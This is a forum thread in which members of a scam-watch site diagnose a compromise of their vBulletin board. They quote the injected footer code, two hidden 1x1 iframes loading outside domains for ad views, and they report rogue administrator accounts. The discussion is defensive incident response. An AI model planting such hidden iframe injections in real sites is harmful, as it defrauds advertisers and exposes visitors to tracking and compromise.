Page 1 of 3 123 LastLast
Results 1 to 25 of 51
Like Tree6Likes

Thread: Strange Connections

  1. #1
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Strange Connections

    I'm probably about to embarrass myself again, but the board is doing something which to my non-expert eye seems strange.

    When I just logged on, the board made various quick connections to and from sites such as googleleads, doubleclick, contextweb, adnxs and others. Those are advertising/tracking sites. It seems a fair assumption that the board was sending them my IP. Sites such as these build profiles of individuals' browsing habits to sell them. I don't log in that often, but this has happened the last couple of times I did.

    In addition, just now and the last time I logged in McAfee blocked a connection the board attempted to make to an IP it deemed unsafe, 216.38.163.167. This resolves to something called "Mirror Image". I'm not sure either why McAfee thinks it unsafe or why the board attempted the connection, but thought I'd relate it.

    You guys know about this?
    "A wise man proportions belief to the evidence."
    - David Hume

  2. #2
    littleroundman is offline Administrator
    Join Date
    Jun 2010
    Posts
    17,157

    Re: Strange Connections

    Your concerns are not strange at all, Wes.

    I'm not sure why McAfee is blocking mirror-image.com. My security software is not.

    mirror-image.com is a completely reputable Content Delivery Network, essential for the smooth operating of many websites
    Mirror Image Internet is more than just a Content Delivery Network (CDN). Our patented, global Dynamic Delivery Network (DDN) solutions leverage the unlimited capacity of our global Content Access Point® (CAP) network to guarantee availability and unsurpassed performance—even during peak traffic periods
    FYI, many of the connections are to graphics members have included in posts. The forum links to the graphics source and retrieves the image every time someone attempts to view it.

    This is one of the reasons many forums discourage the use of linked graphics. Such linking consumes bandwidth and server capacity and can lead to graphic heavy pages loading slowly (as happens in any of the graphic heavy posts in the cash gifting subforum here on REALSCAM.com

    As I post, the forum is linking to:

    ajaxgoogleapis.com
    ajax.googleapis.com is a CDN repository for the popular jquery javescript functionality plus others that modern websites utilise. If you block this then you will stop the website functioning as it was designed to work
    damnxd.com
    We are the best Funny Pics website on the web. We update our site everyday with hundreds of new funny pics.
    jobless-jack.com
    Jobless Jack | MEME | TROLLS | CLOSE ENOUGH | FUNN
    weirdstuffs.com
    BBM Display Pictures | Facebook Covers | Jokes
    Facebook.com

    Google.com


    I would encourage anyone using Firefox who is concerned with cross-site requests to install the Request Policy Firefox addon
    RequestPolicy is an extension for Mozilla browsers that increases your browsing privacy, security, and speed by giving you control over cross-site requests.
    The only thing necessary for the triumph of evil is for good men to do nothing

  3. #3
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    lijit.com, w55c.net, c3tag.com, burstnet.com and several more. And all of these sites are leaving tracking cookies - I just checked. I normally use Firefox, so I just fired up Chrome - same connections.

    I agree that I don't know why McAfee is suspicious of Mirror Image. And I agree that the connections you listed simply serve to retrieve legitimate content. But all of the sites (other than Mirror Image) I listed are in the tracking and selling business. This is not the worst thing in the world, but other sites don't do it.

    Thanks for your reply, LRM, but I still think it's strange.
    "A wise man proportions belief to the evidence."
    - David Hume

  4. #4
    littleroundman is offline Administrator
    Join Date
    Jun 2010
    Posts
    17,157

    Re: Strange Connections

    That's strange, Wes.

    I'm not getting any of those tracking cookie requests, nor do I have any of them showing in my cookie folder.

    We'll check it out.

    Thanks for the info
    The only thing necessary for the triumph of evil is for good men to do nothing

  5. #5
    Whip's Avatar
    Whip is offline Anonymous. As are you all
    Join Date
    Jun 2010
    Posts
    5,930

    Re: Strange Connections

    I had an 'ad.yieldmanager' popup on my phone from here the other day.

  6. #6
    ribshaw's Avatar
    ribshaw is offline Nigerian Ministry
    Join Date
    Feb 2013
    Location
    Internet Cafe Nigeria
    Posts
    5,106

    Re: Strange Connections

    OK, I have had this happen twice, ads have started to play on my computer. Almost like a video ad. As soon as I shut down the site, the ad stops. Happened yeterday and just a second ago.
    "It's virtually impossible to violate rules ... but it's impossible for a violation to go undetected, certainly not for a considerable period of time." Bernie Madoff
    https://www.facebook.com/pages/Scam-...98399986981403

  7. #7
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    It's continuing for me as well. If it helps, a few more connections: hiroserver.com, invitemedia.com, dotomi.com, advertising/tracking sites all. And there are more. I don't think any of these are dangerous, but why is the board doing that?
    "A wise man proportions belief to the evidence."
    - David Hume

  8. #8
    ProfHenryHiggins is offline Elite Scambuster
    Join Date
    Mar 2011
    Posts
    2,826

    Re: Strange Connections

    I've also been seeing a barrage of unfamiliar sites loading when I visit the Realscam homepage.
    Could something have slipped past Jason and gotten imbedded? Or another 1 pixel graphic like MMB pulled on us a while back?


    On the other hand, I don't get the video ad popup, probably due to how my system is set up.
    If you are in Prosper With Integrity, and do not like that your personal information has been published here, please talk to these good people: http://www.attorneygeneral.gov http://www.ic3.gov http://www.fbi.gov

  9. #9
    Soapboxmom's Avatar
    Soapboxmom is offline Administrator
    Join Date
    Jun 2010
    Location
    Mars
    Posts
    7,964
    Blog Entries
    3

    Re: Strange Connections

    A while back I kept seeing embedded links in posts and I assumed it was the site. After some investigation it turned out my computer was infected. I was the only one at that time seeing the live links popping up all over the place.

    As for the issues several of you are experiencing I am not seeing anything. I will alert Jason and Glim. The owner has been tied up but will be checking it out as well. All this does make me miss the simple times and my dial phone just a wee bit!

  10. #10
    NikSam is offline AntiCon Artist
    Join Date
    Dec 2012
    Posts
    2,254

    Re: Strange Connections

    There is definitely something wrong, on a dry run accessing forum.php launches a rollercoaster of cookies from other sites, looks like all originated first from jobless-jack.com
    and damnxd.org (and this is on a page which does not have any non stock images)

    RS_cookies.jpg


    Jason, what is a purpose of having these iframe lines included in forum.php ?

    Code:
    <div id="footer_morecopyright" class="shade footer_morecopyright">
    	<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
    	
    	<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
    	<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
    	
    </div>
    The comment about "do not remove" looks very fishy to me
    Last edited by NikSam; 09-06-2013 at 09:47 AM.

  11. #11
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    The same thing is happening from my office computer.
    "A wise man proportions belief to the evidence."
    - David Hume

  12. #12
    Fendaril is offline Senior Member
    Join Date
    Feb 2013
    Posts
    461

    Re: Strange Connections

    Quote Originally Posted by Soapboxmom View Post
    All this does make me miss the simple times and my dial phone just a wee bit!
    I was never alive for the simple times, but I feel ya.

  13. #13
    Whip's Avatar
    Whip is offline Anonymous. As are you all
    Join Date
    Jun 2010
    Posts
    5,930

    Re: Strange Connections

    I don't automatically accept cookies so I get to see these just asked to be set when I tried to access this site from a different computer:

    widget3.linkwithin.com
    widget5.linkwithin.com
    widget6.linkwithin.com
    jobless-jack.com
    damnxd.org
    whos.amung.us
    rc.rlcdn.com
    lb.adnxs.com
    idsync.rlcdn.com

  14. #14
    scratchycat's Avatar
    scratchycat is offline Elite Scambuster
    Join Date
    Feb 2011
    Posts
    3,477
    Blog Entries
    2

    Re: Strange Connections

    Quote Originally Posted by NikSam View Post
    There is definitely something wrong, on a dry run accessing forum.php launches a rollercoaster of cookies from other sites, looks like all originated first from jobless-jack.com
    and damnxd.org (and this is on a page which does not have any non stock images)

    RS_cookies.jpg


    Jason, what is a purpose of having these iframe lines included in forum.php ?

    Code:
    <div id="footer_morecopyright" class="shade footer_morecopyright">
    	<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
    	
    	<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
    	<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
    	
    </div>
    The comment about "do not remove" looks very fishy to me
    Have been occupied with moving to a new place but I reported it to SBM the other day when I started getting all these weird links popping up. I am mainly using Chrome now and it does not happen on any other sites that I visit. As of 9/11/2013, it is still happening when I login to RS.
    Don't get ripped off!! Stay informed!

  15. #15
    NikSam is offline AntiCon Artist
    Join Date
    Dec 2012
    Posts
    2,254

    Re: Strange Connections

    So, anybody gonna remove that infected HTML code ?

    as VB original template shows:
    Code:
    <div id="footer_morecopyright" class="shade footer_morecopyright">
        <!-- Do not remove cronimage or your scheduled tasks will cease to function -->
        {vb:raw cronimage}
        <!-- Do not remove cronimage or your scheduled tasks will cease to function -->
        {vb:raw vboptions.copyrighttext}
    </div>
    Those infectious iframes are more likely coming from vboptions.copyrighttext variable.
    and resulting in:
    Code:
    <div id="footer_morecopyright" class="shade footer_morecopyright">
    	<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
    	
    	<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
    	<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
    	
    </div>
    Please verify that this code was put by someone in AdminCP > Settings > Options > Site Name / URL / Contact Details > Copyright Text

    And change admin passwords. (might also have come from penetrating MySQL db)
    Last edited by NikSam; 09-13-2013 at 06:24 AM.

  16. #16
    NikSam is offline AntiCon Artist
    Join Date
    Dec 2012
    Posts
    2,254

    Re: Strange Connections

    UPDATE: It seems to be VB exploit, so make sure to install latest fixes, so it doesn't not happen again after removal of Copyright Text,
    check for suspicious new admin accounts, php files which appeared not from stock VBulletin setup, and modifications to stock php files.

    https://forums.digitalpoint.com/thre...erted.2679354/


    to remove Copyright Text as pointed out there:
    You should've able to go into your options and edit the copyrighttext field. I think it might be hidden, so you will need to be in debug mode to see it in there.

    more details on the exploit: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
    Last edited by NikSam; 09-13-2013 at 06:49 AM.

  17. #17
    Soapboxmom's Avatar
    Soapboxmom is offline Administrator
    Join Date
    Jun 2010
    Location
    Mars
    Posts
    7,964
    Blog Entries
    3

  18. #18
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    See the PC World article as well. Especially this part:
    It’s not clear what the exploit currently being investigated would allow potential attackers to do, but the fact that it prompted an advance warning from the developers suggests that it might have serious implications.

    Luke [vBulletin tech guru - WS] declined to disclose information about the nature of the exploit.
    I don't like that. I suggest that users must view their passwords to this site as compromised - if you use your RS password for anything else that matters to you, you ought to change the others. Now.

    And why on God's green earth would anyone not delete the install directory? I think I recall that phpBB (which Quatloos runs on) won't even start until the install directory is gone.

    I would even consider shutting down the board until this is fixed.
    "A wise man proportions belief to the evidence."
    - David Hume

  19. #19
    NikSam is offline AntiCon Artist
    Join Date
    Dec 2012
    Posts
    2,254

    Re: Strange Connections

    Quote Originally Posted by wserra View Post
    ... I suggest that users must view their passwords to this site as compromised ...
    Passwords in VB are stored as hashes, so if it is not dictionary word, short, easy to brute force not likely will be compromised.

    But I agree, as a general rule never use the same password for different sites, get a password management program if you must,
    or at least come up with a scheme to generate pass for sites (like for GMail - mypass_gm)
    Most critical password a person has is to their email , even if you think there is nothing else worth reading for someone, it can be used
    to reset your passwords on other sites (Banks, Paypal, etc.)

  20. #20
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    Quote Originally Posted by NikSam View Post
    Passwords in VB are stored as hashes, so if it is not dictionary word, short, easy to brute force not likely will be compromised.
    So were the passwords in ubuntuforums.org, also running VB, hacked a couple of months ago (perhaps in part by the same exploit). Nonetheless, IIRC, the Ubuntu folks advised everyone to change passwords, especially if used on other sites. No?
    "A wise man proportions belief to the evidence."
    - David Hume

  21. #21
    NikSam is offline AntiCon Artist
    Join Date
    Dec 2012
    Posts
    2,254

    Re: Strange Connections

    Ok, i Already spotted new created Administrators:
    View Profile: .
    View Profile: sky22

  22. #22
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    Quote Originally Posted by NikSam View Post
    Ok, i Already spotted new created Administrators:
    View Profile: .
    View Profile: sky22
    Both created last week.

    Dum-da-DUM-DUM.
    "A wise man proportions belief to the evidence."
    - David Hume

  23. #23
    ribshaw's Avatar
    ribshaw is offline Nigerian Ministry
    Join Date
    Feb 2013
    Location
    Internet Cafe Nigeria
    Posts
    5,106

    Re: Strange Connections

    Would someone update, the non techy users as to what this means and a course of action. I am running AVG internet security, and recently added Malwarebytes at the suggestion of another forum member. So far my scans come back clean, but have no idea what any of this means behind the scenes.
    "It's virtually impossible to violate rules ... but it's impossible for a violation to go undetected, certainly not for a considerable period of time." Bernie Madoff
    https://www.facebook.com/pages/Scam-...98399986981403

  24. #24
    NikSam is offline AntiCon Artist
    Join Date
    Dec 2012
    Posts
    2,254

    Re: Strange Connections

    Ribshaw, your protections are only good for your own PC.

    The RS itself been compromised/hacked/penetrated exploiting
    a programming mistake in VBulletin software on which this forum runs on.

    Whoever did put those hidden iframes are just generating views to their ads, even that you cannot see those ads (they hidden in two 1x1 frames in the bottom which are invisible)

    But since the vulnerability is not addressed, anybody else can repeat the hack for other purposes and perhaps already did too.
    They can steal database of users, install additional backdoors, modify content, etc...

  25. #25
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    Think of it as RS having gained two new admins from the Russian mob.
    "A wise man proportions belief to the evidence."
    - David Hume

Page 1 of 3 123 LastLast

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Disclaimer: Opinions expressed on this website are solely those of their respective authors.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42